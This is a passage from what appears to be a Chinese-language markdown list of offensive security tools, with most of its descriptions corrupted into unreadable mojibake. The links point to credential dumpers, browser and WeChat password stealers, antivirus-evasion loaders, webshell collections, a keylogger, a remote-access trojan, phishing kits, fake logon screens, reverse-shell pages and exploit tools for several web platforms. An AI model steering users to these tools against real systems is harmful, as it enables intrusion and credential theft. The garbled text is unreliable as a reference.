:**[้…็ฝฎreGeorg+Proxifierๆธ—้€ๅ†…็ฝ‘](https://www.k0rz3n.com/2018/07/06/ๅฆ‚ไฝ•ไฝฟ็”จreGeorg+Proxifierๆธ—้€ๅ†…็ฝ‘)|[reGeorg+Proxifierๅฎž็Žฐๅ†…็ฝ‘sock5ไปฃ็†](http://jean.ink/2018/04/26/reGeorg/)|[ๅ†…็ฝ‘ๆธ—้€ไน‹reGeorg+Proxifier](https://sky666sec.github.io/2017/12/16/ๅ†…็ฝ‘ๆธ—้€ไน‹reGeorg-Proxifier)|[reGeorg+Proxifierไฝฟ็”จ](https://xz.aliyun.com/t/228) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘Neo-reGeorg้‡ๆž„็š„reGeorg ](https://github.com/L-codes/Neo-reGeorg) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘Tunna-้€š่ฟ‡http้šง้“ๅฐ†TCPๆต้‡ไปฃ็†ๅ‡บๆฅ](https://github.com/SECFORCE/Tunna) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘proxy.php-ๅ•ๆ–‡ไปถ็‰ˆ็š„phpไปฃ็†](https://github.com/mcnemesis/proxy.php) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘pivotnacci-้€š่ฟ‡HTTP้šง้“ๅฐ†TCPๆต้‡ไปฃ็†ๅ‡บๆฅๆˆ–่ฟ›ๅŽป](https://github.com/blackarrowsec/pivotnacci) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘ๆฏ’ๅˆบ(pystinger)้€š่ฟ‡webshellๅฎž็Žฐ**ๅ†…็ฝ‘SOCK4ไปฃ็†**,**็ซฏๅฃๆ˜ ๅฐ„**.](https://github.com/FunnyWolf/pystinger)|[pystinger.zip-ไธ‹่ฝฝ](./tools/pystinger.zip) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘php-proxy-app-ไธ€ๆฌพไปฃ็†่ฎฟ้—ฎ็ฝ‘็ซ™็š„ๅทฅๅ…ท](https://github.com/Athlon1600/php-proxy-app) - [get_Team_Pass-่Žทๅ–็›ฎๆ ‡ๆœบๅ™จไธŠ็š„teamviewerIDๅ’Œๅฏ†็ (ไฝ ้œ€่ฆๅ…ทๆœ‰ๆœ‰ๆ•ˆ็š„็›ฎๆ ‡ๆœบๅ™จ่ดฆๅทๅฏ†็ ไธ”็›ฎๆ ‡ๆœบๅ™จ445็ซฏๅฃๅฏไปฅ่ขซ่ฎฟ้—ฎ(ๅผ€ๆ”พ445็ซฏๅฃ))](https://github.com/kr1shn4murt1/get_Team_Pass/) - [chromepass-่Žทๅ–chromeไฟๅญ˜็š„่ดฆๅทๅฏ†็ /cookies-nirsoftๅ‡บๅ“ๅœจwin10+chrome 80ๆต‹่ฏ•OK](./tools/chromepass/)|[SharpChrome-ๅŸบไบŽ.NET 2.0็š„ๅผ€ๆบ่Žทๅ–chromeไฟๅญ˜่ฟ‡็š„่ดฆๅทๅฏ†็ /cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-ๅผ€ๆบ่Žทๅ–chromeๅฏ†็ /cookiesๅทฅๅ…ท](https://github.com/malcomvetter/ChromePasswords) - [java-jdwp่ฟœ็จ‹่ฐƒ่ฏ•ๅˆฉ็”จ](https://github.com/Lz1y/jdwp-shellifier)|็›ธๅ…ณๆ–‡็ซ :[jdwp่ฟœ็จ‹่ฐƒ่ฏ•ไธŽๅฎ‰ๅ…จ](https://qsli.github.io/2018/08/12/jdwp/) - [็คพไผšๅทฅ็จ‹ๅญฆๅฏ†็ ็”Ÿๆˆๅ™จ๏ผŒๆ˜ฏไธ€ไธชๅˆฉ็”จไธชไบบไฟกๆฏ็”Ÿๆˆๅฏ†็ ็š„ๅทฅๅ…ท](https://github.com/zgjx6/SocialEngineeringDictionaryGenerator) - [ไบ‘ไธšCMS(yunyecms)็š„ๅคšๅค„SQLๆณจๅ…ฅๅฎก่ฎกๅˆ†ๆž](./books/ไบ‘ไธšCMS(yunyecms)็š„ๅคšๅค„SQLๆณจๅ…ฅๅฎก่ฎกๅˆ†ๆž.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://xz.aliyun.com/t/7302)|[ๅฎ˜็ฝ‘ไธ‹่ฝฝๅœฐๅ€](http://www.yunyecms.com/index.php?m=version&c=index&a=index)|[sqlmap_yunyecms_front_sqli_tamp.py](./tools/sqlmap_yunyecms_front_sqli_tamp.py) - [www.flash.cn ็š„้’“้ฑผ้กต๏ผŒไธญๆ–‡+่‹ฑๆ–‡](https://github.com/r00tSe7en/Fake-flash.cn) - [็ป‡ๆขฆdedecmsๅ…จ็‰ˆๆœฌๆผๆดžๆ‰ซๆ](https://github.com/Mr-xn/dedecmscan) - [CVEใ€CMSใ€ไธญ้—ดไปถๆผๆดžๆฃ€ๆต‹ๅˆฉ็”จๅˆ้›† Since 2019-9-15](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection) - [Dirble -ๅฟซ้€Ÿ็›ฎๅฝ•ๆ‰ซๆๅ’Œ็ˆฌๅ–ๅทฅๅ…ทใ€ๆฏ”dirsearchๅ’Œdirbๆ›ดๅฟซใ€‘](https://github.com/nccgroup/dirble) - [RedRabbit - Red Team PowerShell่„šๆœฌ](https://github.com/securethelogs/RedRabbit) - [Pentest Tools Framework - ๆธ—้€ๆต‹่ฏ•ๅทฅๅ…ท้›†-้€‚็”จไบŽLinux็ณป็ปŸ](https://github.com/pikpikcu/Pentest-Tools-Framework) - [็™ฝ้นฟ็คพๅทฅๅญ—ๅ…ธ็”Ÿๆˆๅ™จ๏ผŒ็ตๆดปไธŽๆ˜“็”จๅ…ผ้กพใ€‚](https://github.com/HongLuDianXue/BaiLu-SED-Tool) - [NodeJsScan-ไธ€ๆฌพ่ฝฌไธบNodejs่ฟ›่กŒ้™ๆ€ไปฃ็ ๆ‰ซๆๅผ€ๅ‘็š„ๅทฅๅ…ท](https://github.com/ajinabraham/NodeJsScan) - [ไธ€ๆฌพๅ›ฝไบบๆ นๆฎpoison ivy้‡ๅ†™็š„่ฟœๆŽง](https://github.com/killeven/Poison-Ivy-Reload) - [NoXss-ๅฏ้…ๅˆburpsuiteๆ‰น้‡ๆฃ€ๆต‹XSS](https://github.com/lwzSoviet/NoXss) - [fofa ้‡‡้›†่„šๆœฌ](https://raw.githubusercontent.com/ggg4566/SomeTools/master/fofa_search.py) - [java web ๅŽ‹็ผฉๆ–‡ไปถ ๅฎ‰ๅ…จ ๆผๆดž](https://github.com/jas502n/Java-Compressed-file-security) - [ๅฏไปฅ่‡ชๅฎšไน‰่ง„ๅˆ™็š„ๅฏ†็ ๅญ—ๅ…ธ็”Ÿๆˆๅ™จ,ๆ”ฏๆŒๅ›พๅฝข็•Œ้ข](https://github.com/bit4woo/passmaker) - [dump lass ๅทฅๅ…ท(็ป•่ฟ‡/ๅนฒๆŽ‰ๅกๅทดๆ–ฏๅŸบ)](./books/dump%20lass%20ๅทฅๅ…ท.pdf)|[loader.zipไธ‹่ฝฝ](./tools/loader.zip) - [GO่ฏญ่จ€็‰ˆๆœฌ็š„mimikatz-็ผ–่ฏ‘ๅŽๅ…ๆ€](https://github.com/vyrus001/go-mimikatz) - [CVE-2019-0708-ๆ‰น้‡ๆฃ€ๆต‹ๆ‰ซๆๅทฅๅ…ท](./tools/cve0708.rar) - [dump lsass็š„ๅทฅๅ…ท](https://github.com/outflanknl/Dumpert)|[ๅˆไธ€ไธชdump lsass็š„ๅทฅๅ…ท](https://github.com/7hmA3s/dump_lsass) - [Cobalt Strikeๆ’ไปถ - RDPๆ—ฅๅฟ—ๅ–่ฏ&ๆธ…้™ค](https://github.com/QAX-A-Team/EventLogMaster) - [xencrypt-ไธ€ๆฌพๅˆฉ็”จpowershellๆฅๅŠ ๅฏ†ๅนถ้‡‡็”จGzip/DEFLATEๆฅ็ป•่ฟ‡ๆ€่ฝฏ็š„ๅทฅๅ…ท](https://github.com/the-xentropy/xencrypt) - [SessionGopher-ไธ€ๆฌพ้‡‡็”จpowershellๆฅ่งฃๅฏ†Windowsๆœบๅ™จไธŠไฟๅญ˜็š„sessionๆ–‡ไปถ๏ผŒไพ‹ๅฆ‚๏ผš WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop๏ผŒๆ”ฏๆŒ่ฟœ็จ‹ๅŠ ่ฝฝๅ’ŒๆœฌๅœฐๅŠ ่ฝฝไฝฟ็”จ](https://github.com/Arvanaghi/SessionGopher) - [CVE-2020-0796 Local Privilege Escalation POC-python็‰ˆๆœฌ](https://github.com/ZecOps/CVE-2020-0796-LPE-POC)|[CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC) - [Windowsๆ€่ฝฏๅœจ็บฟๅฏนๆฏ”่พ…ๅŠฉ](https://github.com/r00tSe7en/get_AV) - [้€’ๅฝ’ๅผๅฏปๆ‰พๅŸŸๅๅ’Œapi](https://github.com/p1g3/JSINFO-SCAN) - [mssqli-duet-็”จไบŽmssql็š„sqlๆณจๅ…ฅ่„šๆœฌ,ไฝฟ็”จRID็ˆ†็ ด,ไปŽActive Directory็Žฏๅขƒไธญๆๅ–ๅŸŸ็”จๆˆท](https://github.com/Keramas/mssqli-duet) - [ใ€Android่„ฑๅฃณใ€‘ไน‹ไธ€้”ฎๆๅ–APPๆ•ๆ„Ÿไฟกๆฏ](https://github.com/TheKingOfDuck/ApkAnalyser) - [Shiro็ณปๅˆ—ๆผๆดžๆฃ€ๆต‹GUI็‰ˆๆœฌ-ShiroExploit GUI็‰ˆๆœฌ](https://github.com/feihong-cs/ShiroExploit_GUI) - [้€š่ฟ‡phpinfo่Žทๅ–cookie็ช็ ดhttponly](./้€š่ฟ‡phpinfo่Žทๅ–cookie็ช็ ดhttponly.md) - [phpstudy RCE ๅˆฉ็”จๅทฅๅ…ท windows GUI็‰ˆๆœฌ](https://github.com/aimorc/phpstudyrce) - [WebAliveScan-ๆ นๆฎ็ซฏๅฃๅฟซ้€Ÿๆ‰ซๆๅญ˜ๆดป็š„WEB](https://github.com/broken5/WebAliveScan) - [ๆ‰ซๆๅฏๅ†™็›ฎๅฝ•.aspx](./tools/ๆ‰ซๆๅฏๅ†™็›ฎๅฝ•.aspx) - [PCๅฎขๆˆท็ซฏ๏ผˆC-Sๆžถๆž„๏ผ‰ๆธ—้€ๆต‹่ฏ•](https://github.com/theLSA/CS-checklist) - [wsltools-webๆ‰ซๆ่พ…ๅŠฉpythonๅบ“](https://github.com/Symbo1/wsltools) - [struts2_check-็”จไบŽ่ฏ†ๅˆซ็›ฎๆ ‡็ฝ‘็ซ™ๆ˜ฏๅฆ้‡‡็”จStruts2ๆก†ๆžถๅผ€ๅ‘็š„ๅทฅๅ…ท](https://github.com/coffeehb/struts2_check) - [sharpmimi.exe-ๅ…ๆ€็‰ˆmimikatz](./tools/sharpmimi.exe) - [thinkPHPไปฃ็ ๆ‰ง่กŒๆ‰น้‡ๆฃ€ๆต‹ๅทฅๅ…ท](https://github.com/admintony/thinkPHPBatchPoc) - [pypykatz-็”จ็บฏPythonๅฎž็Žฐ็š„Mimikatz](https://github.com/skelsec/pypykatz) - [Flux-Keylogger-ๅ…ทๆœ‰Web้ขๆฟ็š„็ŽฐไปฃJavascript้”ฎ็›˜่ฎฐๅฝ•ๅ™จ](https://github.com/LimerBoy/Flux-Keylogger) - [JSINFO-SCAN-้€’ๅฝ’ๅผๅฏปๆ‰พๅŸŸๅๅ’Œapi](https://github.com/p1g3/JSINFO-SCAN) - [FrameScan-GUI ไธ€ๆฌพpython3ๅ’ŒPyqt็ผ–ๅ†™็š„ๅ…ทๆœ‰ๅ›พๅฝขๅŒ–็•Œ้ข็š„cmsๆผๆดžๆฃ€ๆต‹ๆก†ๆžถ](https://github.com/qianxiao996/FrameScan-GUI) - [SRC่ต„ไบงไฟกๆฏ่šๅˆ็ฝ‘็ซ™](https://github.com/cckuailong/InformationGather) - [Spring Boot ActuatorๆœชๆŽˆๆƒ่ฎฟ้—ฎใ€XXEใ€RCEใ€‘ๅ•/ๅคš็›ฎๆ ‡ๆฃ€ๆต‹](https://github.com/rabbitmask/SB-Actuator) - [JNDI ๆณจๅ…ฅๅˆฉ็”จๅทฅๅ…ทใ€Fastjsonใ€Jackson ็ญ‰็›ธๅ…ณๆผๆดžใ€‘](https://github.com/JosephTribbianni/JNDI) - [ๅ„็งๅๅผนshell็š„่ฏญๅฅ้›†ๅˆ้กต้ข](https://krober.biz/misc/reverse_shell.php) - [่งฃๅฏ†weblogic AESๆˆ–DESๅŠ ๅฏ†ๆ–นๆณ•](https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi) - [ไฝฟ็”จ sshLooterC ๆŠ“ๅ– SSH ๅฏ†็ ](https://github.com/mthbernardes/sshLooterC)|[็›ธๅ…ณๆ–‡็ซ ](https://www.ch1ng.com/blog/208.html)|[ๆœฌๅœฐ็‰ˆๆœฌ](./books/ไฝฟ็”จsshLooterCๆŠ“ๅ–SSHๅฏ†็ .pdf) - [redis-rogue-server-Redis 4.x/5.x RCE](https://github.com/AdministratorGithub/redis-rogue-server) - [ew-ๅ†…็ฝ‘็ฉฟ้€(่ทจๅนณๅฐ)](https://github.com/idlefire/ew) - [xray-weblisten-ui-ไธ€ๆฌพๅŸบไบŽGO่ฏญ่จ€ๅ†™็š„Xray ่ขซๅŠจๆ‰ซๆ็ฎก็†](https://github.com/virink/xray-weblisten-ui) - [SQLEXP-SQL ๆณจๅ…ฅๅˆฉ็”จๅทฅๅ…ท๏ผŒๅญ˜ๅœจwaf็š„ๆƒ…ๅ†ตไธ‹่‡ชๅฎšไน‰็ผ–ๅ†™tamper่„šๆœฌ dumpๆ•ฐๆฎ](https://github.com/ggg4566/SQLEXP) - [SRC่ต„ไบงๅœจ็บฟ็ฎก็†็ณป็ปŸ - Shots](https://github.com/broken5/Shots) - [luject๏ผšๅฏไปฅๅฐ†ๅŠจๆ€ๅบ“้™ๆ€ๆณจๅ…ฅๅˆฐๆŒ‡ๅฎšๅบ”็”จ็จ‹ๅบๅŒ…็š„ๅทฅๅ…ท๏ผŒ็›ฎๅ‰ๆ”ฏๆŒAndroid/iPhonsOS/Windows/macOS/Linux](https://github.com/lanoox/luject)|[็›ธๅ…ณๆ–‡็ซ ](https://tboox.org/cn/2020/04/26/luject/) - [CursedChrome๏ผšChromeๆ‰ฉๅฑ•ๆคๅ…ฅ็จ‹ๅบ๏ผŒๅฏๅฐ†ๅ—ๅฎณChromeๆต่งˆๅ™จ่ฝฌๅ˜ไธบๅŠŸ่ƒฝ้ฝๅ…จ็š„HTTPไปฃ็†๏ผŒไฝฟไฝ ่ƒฝๅคŸไปฅๅ—ๅฎณไบบ่บซไปฝๆต่งˆ็ฝ‘็ซ™](https://github.com/mandatoryprogrammer/CursedChrome) - [pivotnacci๏ผš้€š่ฟ‡HTTP้šง้“่ฟ›่กŒSocks่ฟžๆŽฅ](https://github.com/blackarrowsec/pivotnacci) - [PHPFuck-ไธ€ๆฌพ้€‚็”จไบŽphp7ไปฅไธŠ็‰ˆๆœฌ็š„ไปฃ็ ๆททๆท†](https://github.com/splitline/PHPFuck)|[[PHPFuckๅœจ็บฟ็‰ˆๆœฌ](https://splitline.github.io/PHPFuck/) - [ๅ†ฐ่Ž bypass open_basedir ็š„้ฉฌ](./tools/ๅ†ฐ่Žbypass_open_basedir_shell.md) - [goproxy heroku ไธ€้”ฎ้ƒจ็ฝฒๅฅ—่ฃ…๏ผŒๆŠŠherokuๅ˜ไธบๅ…่ดน็š„http(s)\socks5ไปฃ็†](https://github.com/snail007/goproxy-heroku) - [่‡ชๅทฑๆ”ถ้›†ๆ•ด็†็š„็ซฏๅฃใ€ๅญๅŸŸใ€่ดฆๅทๅฏ†็ ใ€ๅ…ถไป–ๆ‚ไธƒๆ‚ๅ…ซๅญ—ๅ…ธ๏ผŒ็”จไบŽ่‡ชๅทฑไฝฟ็”จ](https://github.com/cwkiller/Pentest_Dic) - [xFTP6ๅฏ†็ ่งฃๅฏ†](./tools/xFTP6ๅฏ†็ ่งฃๅฏ†.md) - [Mars-ๆˆ˜็ฅžTideSecๅ‡บๅ“็š„WDScanner็š„้‡ๅ†™ไธ€ๆฌพ็ปผๅˆ็š„ๆผๆดžๆ‰ซๆ,่ต„ไบงๅ‘็Žฐ/ๅ˜ๆ›ด,ๅŸŸๅ็›‘ๆŽง/ๅญๅŸŸๅๆŒ–ๆŽ˜,Awvsๆ‰ซๆ,POCๆฃ€ๆต‹,webๆŒ‡็บนๆŽขๆต‹ใ€็ซฏๅฃๆŒ‡็บนๆŽขๆต‹ใ€CDNๆŽขๆต‹ใ€ๆ“ไฝœ็ณป็ปŸๆŒ‡็บนๆŽขๆต‹ใ€ๆณ›่งฃๆžๆŽขๆต‹ใ€WAFๆŽขๆต‹ใ€ๆ•ๆ„Ÿไฟกๆฏๆฃ€ๆต‹็ญ‰็ญ‰ๅทฅๅ…ท](https://github.com/TideSec/Mars) - [Shellcode Compiler๏ผš็”จไบŽ็”ŸๆˆWindows ๅ’Œ Linuxๅนณๅฐ็š„shellcodeๅทฅๅ…ท](https://github.com/NytroRST/ShellcodeCompiler) - [BadDNS ๆ˜ฏไธ€ๆฌพไฝฟ็”จ Rust ๅผ€ๅ‘็š„ไฝฟ็”จๅ…ฌๅ…ฑ DNS ๆœๅŠกๅ™จ่ฟ›่กŒๅคšๅฑ‚ๅญๅŸŸๅๆŽขๆต‹็š„ๆž้€Ÿๅทฅๅ…ท](https://github.com/joinsec/BadDNS) - [ใ€Android่„ฑๅฃณใ€‘XServerๆ˜ฏไธ€ไธช็”จไบŽๅฏนๆ–นๆณ•่ฟ›่กŒๅˆ†ๆž็š„Xposedๆ’ไปถ](https://github.com/monkeylord/XServer)|[็›ธๅ…ณๆ–‡็ซ ๏ผšXposed+XServerๆ— ้œ€่„ฑๅฃณๆŠ“ๅ–ๅŠ ๅฏ†ๅŒ…](https://xz.aliyun.com/t/7669)|[ไฝฟ็”จxserverๅฏนๆŸๅบ”็”จ่ฟ›่กŒไธ่„ฑๅฃณๆŠ“ๅŠ ๅฏ†ๅŒ…](https://blog.csdn.net/nini_boom/article/details/104400619) - [masscan_to_nmap-ๅŸบไบŽmasscanๅ’Œnmap็š„ๅฟซ้€Ÿ็ซฏๅฃๆ‰ซๆๅ’ŒๆŒ‡็บน่ฏ†ๅˆซๅทฅๅ…ท](https://github.com/7dog7/masscan_to_nmap) - [Evilreg -ไฝฟ็”จWindowsๆณจๅ†Œ่กจๆ–‡ไปถ็š„ๅๅ‘Shell (.Reg)](https://github.com/thelinuxchoice/evilreg) - [Shecodjectๅทฅๅ…ทไฝฟ็”จpythonๆณจๅ…ฅshellcode bypass ็ซ็ตจ,360,windows defender](https://github.com/TaroballzChen/Shecodject) - [Malleable-C2-Profiles-Cobalt Strike็š„C2้š่—้…็ฝฎๆ–‡ไปถ็›ธๅ…ณ](https://github.com/xx0hcd/Malleable-C2-Profiles)|[ๆธ—้€ๅˆฉๅ™จCobalt Strike - ็ฌฌ2็ฏ‡ APT็บง็š„ๅ…จ้ขๅ…ๆ€ไธŽไผไธš็บตๆทฑ้˜ฒๅพกไฝ“็ณป็š„ๅฏนๆŠ—](https://xz.aliyun.com/t/4191) - [AutoRemove-่‡ชๅŠจๅธ่ฝฝ360](https://github.com/DeEpinGh0st/AutoRemove) - [ligolo๏ผš็”จไบŽๆธ—้€ๆ—ถๅๅ‘้šง้“่ฟžๆŽฅๅทฅๅ…ท](https://github.com/sysdream/ligolo) - [RMIScout: Java RMI็ˆ†็ ดๅทฅๅ…ท](https://github.com/BishopFox/rmiscout) - [ใ€Android่„ฑๅฃณใ€‘FRIDA-DEXDump-ใ€ไฝฟ็”จFridaๆฅ่ฟ›่กŒAndroid่„ฑๅฃณใ€‘](https://github.com/hluwa/FRIDA-DEXDump) - [Donut-Shellcode็”Ÿๆˆๅทฅๅ…ท](https://github.com/TheWover/donut) - [JSP-Webshells้›†ๅˆใ€2020ๆœ€ๆ–ฐbypassๆŸไบ‘ๆฃ€ๆต‹ๅฏ็”จใ€‘](https://github.com/threedr3am/JSP-Webshells) - [one-scan-ๅคšๅˆไธ€็ฝ‘็ซ™ๆŒ‡็บนๆ‰ซๆๅ™จ๏ผŒ่ฝปๆพ่Žทๅ–็ฝ‘็ซ™็š„ IP / DNS ๆœๅŠกๅ•† / ๅญๅŸŸๅ / HTTPS ่ฏไนฆ / WHOIS / ๅผ€ๅ‘ๆก†ๆžถ / WAF ็ญ‰ไฟกๆฏ](https://github.com/Jackeriss/one-scan) - [ServerScanไธ€ๆฌพไฝฟ็”จGolangๅผ€ๅ‘็š„้ซ˜ๅนถๅ‘็ฝ‘็ปœๆ‰ซๆใ€ๆœๅŠกๆŽขๆต‹ๅทฅๅ…ทใ€‚](https://github.com/Adminisme/ServerScan) - [ๅŸŸๆธ—้€-Windows hash dumpไน‹secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)|[็›ธๅ…ณๆ–‡็ซ ](https://github.com/PythonPig/PythonPig.github.io/blob/730be0e55603df96f45680c25c56ba8148052d2c/_posts/2019-07-16-Windows%20hash%20dump%E4%B9%8Bsecretsdump.md) - [WindowsVulnScan๏ผšๅŸบไบŽไธปๆœบ็š„ๆผๆดžๆ‰ซๆๅทฅใ€็ฑปไผผwindows-exp-suggesterใ€‘](https://github.com/chroblert/WindowsVulnScan) - [ๅŸบไบŽๅฎžๆˆ˜ๆฒ‰ๆท€ไธ‹็š„ๅ„็งๅผฑๅฃไปคๅญ—ๅ…ธ](https://github.com/klionsec/SuperWordlist) - [SpoofWeb๏ผšไธ€้”ฎ้ƒจ็ฝฒHTTPS้’“้ฑผ็ซ™](https://github.com/klionsec/SpoofWeb) - [VpsEnvInstall๏ผšไธ€้”ฎ้ƒจ็ฝฒVPSๆธ—้€็Žฏๅขƒ](https://github.com/klionsec/VpsEnvInstall) - [tangalanga๏ผšZoomไผš่ฎฎๆ‰ซๆๅทฅๅ…ท](https://github.com/elcuervo/tangalanga) - [็ขŽ้ฎSZhe_Scan Webๆผๆดžๆ‰ซๆๅ™จ๏ผŒๅŸบไบŽpython Flaskๆก†ๆžถ๏ผŒๅฏน่พ“ๅ…ฅ็š„ๅŸŸๅ/IP่ฟ›่กŒๅ…จ้ข็š„ไฟกๆฏๆœ้›†๏ผŒๆผๆดžๆ‰ซๆ๏ผŒๅฏ่‡ชไธปๆทปๅŠ POC](https://github.com/Cl0udG0d/SZhe_Scan) - [Taie-RedTeam-OS-ๆณฐ้˜ฟๅฎ‰ๅ…จๅฎž้ชŒๅฎค-ๅŸบไบŽXUbuntu็งไบบ่ฎขๅˆถ็š„็บข่“ๅฏนๆŠ—ๆธ—้€ๆ“ไฝœ็ณป็ปŸ](https://github.com/taielab/Taie-RedTeam-OS) - [naiveproxy-ไธ€ๆฌพ็”จC่ฏญ่จ€็ผ–ๅ†™็ฑปไผผไบŽtrojan็š„ไปฃ็†ๅทฅๅ…ท](https://github.com/klzgrad/naiveproxy) - [BrowserGhost-ไธ€ไธชๆŠ“ๅ–ๆต่งˆๅ™จๅฏ†็ ็š„ๅทฅๅ…ท๏ผŒๅŽ็ปญไผšๆทปๅŠ ๆ›ดๅคšๅŠŸ่ƒฝ](https://github.com/QAX-A-Team/BrowserGhost) - [GatherInfo-ๆธ—้€ๆต‹่ฏ•ไฟกๆฏๆœ้›†/ๅ†…็ฝ‘ๆธ—้€ไฟกๆฏๆœ้›†](https://github.com/Paper-Pen/GatherInfo) - [EvilPDF๏ผšไธ€ๆฌพๆŠŠๆถๆ„ๆ–‡ไปถๅตŒๅ…ฅๅœจ PDF ไธญ็š„ๅทฅๅ…ท](https://github.com/thelinuxchoice/evilpdf) - [SatanSword-็บข้˜Ÿ็ปผๅˆๆธ—้€ๆก†ๆžถ๏ผŒๆ”ฏๆŒwebๆŒ‡็บน่ฏ†ๅˆซใ€ๆผๆดžPoCๆฃ€ๆต‹ใ€ๆ‰น้‡webไฟกๆฏๅ’Œ็ซฏๅฃไฟกๆฏๆŸฅ่ฏขใ€่ทฏๅพ„ๆ‰ซๆใ€ๆ‰น้‡JSๆŸฅๆ‰พๅญๅŸŸๅใ€ไฝฟ็”จgoogle headlessใ€ๅ็จ‹ๆ”ฏๆŒใ€ๅฎŒๆ•ด็š„ๆ—ฅๅฟ—ๅ›žๆบฏ](https://github.com/Lucifer1993/SatanSword) - [Get-WeChat-DB-่Žทๅ–็›ฎๆ ‡ๆœบๅ™จ็š„ๅพฎไฟกๆ•ฐๆฎๅบ“ๅ’Œๅฏ†้’ฅ](https://github.com/A2kaid/Get-WeChat-DB) - [ThinkphpRCE-ๆ”ฏๆŒไปฃ็†IPๆฑ ็š„ๆ‰น้‡ๆฃ€ๆต‹Thinkphpๆผๆดžๆˆ–่€…ๆ—ฅๅฟ—ๆณ„้œฒ็š„py3่„šๆœฌ](https://github.com/sukabuliet/ThinkphpRCE) - [fakelogonscreen-ไผช้€ ๏ผˆWindows๏ผ‰็ณป็ปŸ็™ปๅฝ•้กต้ข,ๆˆช่Žทๅฏ†็ ](https://github.com/bitsadmin/fakelogonscreen) - [WMIHACKER-ไป…135็ซฏๅฃๅ…ๆ€ๆจชๅ‘็งปๅŠจ](https://github.com/360-Linton-Lab/WMIHACKER)|[ไฝฟ็”จๆ–นๆณ•ไปฅๅŠไป‹็ป](./books/WMIHACKER๏ผˆไป…135็ซฏๅฃๅ…ๆ€ๆจชๅ‘็งปๅŠจ๏ผ‰.pdf)|[ๆจชๅ‘็งปๅŠจๅทฅๅ…ทWMIHACKER](./books/ๆจชๅ‘็งปๅŠจๅทฅๅ…ทWMIHACKER.pdf)|[ๅŽŸๆ–‡้“พๆŽฅ](https://www.anquanke.com/post/id/209665) - [cloud-ranges-้ƒจๅˆ†ๅ…ฌๆœ‰ไบ‘IPๅœฐๅ€่Œƒๅ›ด](https://github.com/pry0cc/cloud-ranges) - [sqltools_ch-sqltools2.0ๆฑ‰ๅŒ–ๅขžๅผบ็‰ˆ](./ttools/sqltools_ch.rar) - [railgun-poc_1.0.1.7-ๅคšๅŠŸ่ƒฝ็ซฏๅฃๆ‰ซๆ/็ˆ†็ ด/ๆผๆดžๅˆฉ็”จ/็ผ–็ ่ฝฌๆข็ญ‰](./tools/railgun-poc_1.0.1.7.zip) - [dede_funcookie.php-DEDECMSไผช้šๆœบๆผๆดžๅˆ†ๆž (ไธ‰) ็ขฐๆ’ž็‚น(็ˆ†็ ด๏ผŒไผช้€ ็ฎก็†ๅ‘˜cookie็™ป้™†ๅŽๅฐgetshell](./tools/dede_funcookie.php) - [WAScan-ไธ€ๆฌพๅŠŸ่ƒฝๅผบๅคง็š„Webๅบ”็”จ็จ‹ๅบๆ‰ซๆๅทฅๅ…ทใ€ๅŸบไบŽpythonๅผ€ๅ‘็š„ๅ‘ฝไปค่กŒๆ‰ซๆๅ™จใ€‘](https://github.com/m4ll0k/WAScan) - [Peinject_dll-CSๆ’ไปถไน‹ๅฆ็ฑปๆŒไน…ๅŒ–ๆ–นๆณ•-PEๆ„ŸๆŸ“](https://github.com/m0ngo0se/Peinject_dll) - [MSSQL_BackDoor-ๆ‘†่„ฑMSSMSๅ’Œ Navicat ่ฐƒ็”จๆ‰ง่กŒ sp_cmdExec](https://github.com/evi1ox/MSSQL_BackDoor) - [xShock-ไธ€ๆฌพ้’ˆๅฏนShellshockๆผๆดž็š„ๅˆฉ็”จๅทฅๅ…ทใ€ไพ‹ๅฆ‚ไฝŽ็‰ˆๆœฌcgi็š„้ป˜่ฎค้…็ฝฎ้กต้ข่ฟ›่กŒๅˆฉ็”จใ€‘](https://github.com/capture0x/xShock/) - [tini-tools-้’ˆๅฏน็บข่“ๅฏนๆŠ—ๅ„ไธชๅœบๆ™ฏไฝฟ็”จ็š„ๅฐๅทฅๅ…ท-ใ€ไธป่ฆๆ˜ฏJavaๅ†™็š„ๅทฅๅ…ทใ€‘ใ€็›ฎๅ‰ๆœ‰phpstudy.jarๅ’ŒๅŸŸๅ่ฝฌIPๅทฅๅ…ท.jarใ€‘](https://github.com/sunird/tini-tools) - [code6-็ ๅฐๅ…ญๆ˜ฏไธ€ๆฌพ GitHub ไปฃ็ ๆณ„้œฒ็›‘ๆŽง็ณป็ปŸ๏ผŒ้€š่ฟ‡ๅฎšๆœŸๆ‰ซๆ GitHub ๅ‘็Žฐไปฃ็ ๆณ„้œฒ่กŒไธบ](https://github.com/4x99/code6) - [taowu-cobalt-strike-้€‚็”จไบŽcobalt strike3.xไธŽcobalt strike4.x็š„ๆ’ไปถ](https://github.com/pandasec888/taowu-cobalt-strike) - [Weblogic-scan-Weblogic ๆผๆดžๆ‰น้‡ๆ‰ซๆๅทฅๅ…ท](./tools/Weblogic-scan) - [revp๏ผšๅๅ‘HTTPไปฃ็†๏ผŒๆ”ฏๆŒLinux๏ผŒWindowsๅ’ŒmacOS](https://github.com/jafarlihi/revp) - [fofa2Xray-ไธ€ๆฌพ่”ๅˆfofaไธŽxray็š„่‡ชๅŠจๅŒ–ๆ‰น้‡ๆ‰ซๆๅทฅๅ…ท,ไฝฟ็”จGolang็ผ–ๅ†™๏ผŒ้€‚็”จไบŽwindowsไธŽlinux](https://github.com/piaolin/fofa2Xray) - [CasExp-Apereo CAS ๅๅบๅˆ—ๅŒ–ๅˆฉ็”จๅทฅๅ…ท](https://github.com/potats0/CasExp) - [C_Shot-shellcode่ฟœ็จ‹ๅŠ ่ฝฝๅ™จ](https://github.com/anthemtotheego/C_Shot)|[็›ธๅ…ณๆ–‡็ซ ](./books/C_shotโ€“shellcode่ฟœ็จ‹ๅŠ ่ฝฝๅ™จ.pdf) - 